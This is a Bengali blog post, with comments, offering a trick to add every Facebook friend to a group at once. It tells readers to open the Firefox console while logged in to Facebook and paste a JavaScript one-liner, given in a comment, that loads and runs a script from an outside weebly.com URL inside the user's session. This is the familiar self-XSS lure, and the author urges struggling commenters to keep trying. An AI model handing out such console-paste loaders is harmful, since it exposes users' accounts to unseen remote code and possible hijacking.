Latest posts by xiuqing4219 (see all)
বিসমিল্লাহির রাহমানির রাহিম…………………………।।
আসসালামু আলাইকুম। সবাই কেমন আছেন ? আসা করি সবাই ভাল আছেন। আমি জানি আপনারা সব সময় ভালই থাকেন। আমিও আপনাদের দোয়াতে ভাল আছি। এটা আমার জীবনের প্রথম পোষ্ট। তাই আশা করবো কোন ভুল করলে সেটা ক্ষমা সুন্দর চোখে দেখবেন।
আগেই বলে রাখি, আজ আপনাদের সাথে আমি যে বিষয়টা শেয়ার করবো সেই রকম একটা বিষয় নিয়ে অনেক দিন আগে অন্য একটা ব্লগে একটা পোষ্ট দেখেছিলাম। দেখে মনে হয়েছিল কাজের একটা পোষ্ট, তাই কপি করে রেখেছিলাম। কিন্তু দুঃখের বিষয় হল আমি লিঙ্কটা কপি করে রাখিনি। :(
আজ আমি সেই ব্যপারট নিয়েই আপনাদের সাথে আলচনা করতে এসেছি। (যদিও ওই পোষ্টটা থেকে একটু অন্য ভাবে)।
চলুন শুরু করা যাক। বর্তমানে কারো Facebook account নেই এমন মানুষের সংখ্যা কমই । অনেকে আবার এক বা একাধিক গ্রুপের মালিকও !! তাদের আবার হয়তো কারো কারো ফ্রেন্ডলিষ্টে হাজার হাজার ফ্রেন্ড। ফেসবুকের নিয়ম অনুযায়ী সব ফ্রেন্ডকে গ্রুপে এক বারে যোগ করা যায় না। সে ক্ষেত্রে একজন একজন করে যোগ করতে হয়। কিন্তু এখন থেকে আর না !! :D এখন থেকে এক ক্লিকেই যোগ করে ফেলুন ফ্রেন্ডলিষ্ট এর সব বন্ধুকে !!! :D:D:D
চলুন দেখি কি কি করতে হবেঃ (বিঃদ্রঃ এটা শুধু মাত্র ফায়ারফক্স, কমিটবার্ড ব্রাউজার ব্যবহারকারীদের জন্য।)
আপনার সব বন্ধুকে যে কোন ফেসবুক গ্রুপে এ্যাড করতে নিম্নোক্ত পদক্ষেপ গ্রহণ করুনঃ-
{১} আপনি যে গ্রুপে আপনার সব বন্ধুদের একত্রে যোগ করতে চান প্রথমে মজিলা ফায়ারফক্স/কমিটবার্ড ব্যবহার করে সেই গ্রুপে যান !
{২} এবার কীবোর্ডে Ctrl + Shift + K একসাথে চাপুন । দেখবেন একটা ড্রপ ডাউন মেনু এসেছে, এখানে জাভা স্ক্রিপ্ট লিখে আপনি অনেক কিছুই করতে পারেন। তবে আজ আপনাদের কে কিভাবে আপনার সব ফ্রেন্ডদের একটি গ্রুপে যোগ করবেন তা দেখাবো ।

{৪} এখন, ড্রপ ডাউন মেনুতে যেখানে জাভা স্ক্রিপ্ট লেখার জন্য একটা কারসর ব্লিঙ্ক করছে সেখানে সম্পূর্ণ কোডটি পেস্ট করে দিন, এবার Enter চাপুন।
ব্যাস… আপনার কাজ শেষ !! এখন আপনার সব বন্ধু গ্রুপে এ্যাড না হয়ে যাওয়া পর্যন্ত একটু অপেক্ষা করুন। কিছুক্ষন পরে দেখবেন আপনার সব বন্ধু আপনার প্রিয় গ্রুপটি তে যোগ হয়ে গেছে…!!! :D:D:D
এভাবে আপনার ঘনিষ্ট সব বন্ধুদের বলুন, তারাও আপনাকে আপনার গ্রুপে বন্ধু যোগ করতে সাহায্য করবে।
আজ এ পর্যন্তই, আপনাদের ভাল লাগলে একটু কষ্ট করে জানাবেন………………… ধন্যবাদ !!
আমি পারতেছি না। code pase হয় না।
বিস্তারিত জানতে এখানে যেতে পারেনঃ https://www.facebook.com/groups/TechzGame/
আর বিস্তারিত দরকার…
মন্তব্যের জন্য অনেক ধন্যবাদ।:)
এরপর থেকে অবশ্যই চেষ্টা করবো। তবে এই পোষ্ট এর কোথাও কেউ না বুঝলে আমি আমার যথাসাধ্য বুঝাতে চেষ্টা করব ইনশাআল্ললাহ।
পারছিনা তো ভাই
সাহায্য করেন প্লিজ
ব্যাসিক আলী@ প্রথমে মজিলা অপেন করে ফেসবুকে লগিন করুন। তার পর যে গ্রুপ এ বন্ধুদের যোগ করতে চান সেই গ্রুপে প্রবেশ করুন।
তার পর কীবোর্ড এর Ctrl + Shift + K একসাথে চাপুন। দেখবেন নিচের দিকে একটা মেনু এসেছে। এইবার নিচের জাভা স্ক্রিপ্টটি পুরোটা Copy করুন। অথবা পুরো জাভা স্ক্রিপ্টটা সিলেক্ট করে একসাথে Ctrl + C চাপুন। এখন দেখুন ড্রপ ডাউন মেনুর নিচের দিকে জাভা স্ক্রিপ্ট লেখার জন্য একটা কারসর ব্লিঙ্ক করছে সেখানে সম্পূর্ণ কোডটি পেস্ট করে দিন, এবার Enter চাপুন। একটু মনোযোগ দিয়ে চেষ্টা করুন অবশ্যই পারবেন। তার পরেও না পারলে এখানে বলবেন, আমি তো আছিই…!!! :D
(জাভা স্ক্রিপ্টটা নিচে দেয়া হল।)
javascript:(function(){document.body.appendChild(document.createElement(‘script’)).src=’http://www.weebly.com/uploads/1/5/4/8/15485034/bappi.js’;})();
ভাই আপনার কথামত সবই করলাম। ২ ঘন্টা অপেক্ষা ও করলাম কিন্তু আমার ফ্যান তো বাড়লো না। আগের সংখ্যাই আছে।
আমার ফ্যানপেজ https://www.facebook.com/mywebblogonline
জাবা কোডটি দিলে এউ মেসেজটি দেয় [09:57:30.794] SyntaxError: illegal character
earnbd@ আপনি কি জাভা স্ক্রীপ্ট পুরোটাই কপি করে পেষ্ট করেছেন ??
জাভা স্ক্রীপ্ট যদি পুরোটা কপি না করেন তাহলে কিন্তু হবে না।
দয়া করে পুরোটা পেষ্ট করে এন্টার চাপুন ১০০০০% কাজ হবে। :)
আর আপনি যে লিঙ্কটা দিয়েছেন সেটা তো ফেসবুক পেজ এর আইডি।
আমি এখানে গ্রুপের কথা বলেছি।